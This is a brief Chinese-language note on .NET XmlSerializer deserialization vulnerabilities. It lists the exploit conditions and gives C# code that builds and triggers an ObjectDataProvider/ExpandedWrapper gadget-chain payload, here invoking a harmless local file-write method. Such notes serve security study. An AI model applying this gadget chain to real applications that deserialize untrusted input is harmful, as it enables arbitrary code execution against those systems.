.Net反序列化漏洞之XmlSerializer

條件：

1. 初始化對象時，類型可控：new XmlSerializer(type可控)
2. 反序列化對象時，輸入內容可控：serializer.Deserialize(fi可控)

兩個關鍵類：ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0
System.Windows.Data.ObjectDataProvider

//System.Data.Services.dll   v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper

Payload生成：

        public static void serializeObjectWithXmlSer()
        {
            ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2,ObjectDataProvider>();
            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            eobj.ProjectedProperty0 = new ObjectDataProvider();
            eobj.ProjectedProperty0.ObjectInstance = new Class2();
            eobj.ProjectedProperty0.MethodName = "writeFile";
            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");

            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
            serializer.Serialize(fo, eobj);
            fo.Close();
        }

觸發Payload：

        public static void deserializeObjectWithXmlSer()
        {
            XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            TextReader fi = new StreamReader("d:/tmp/xmlser.txt");
            ser.Deserialize(fi);
            fi.Close();
        }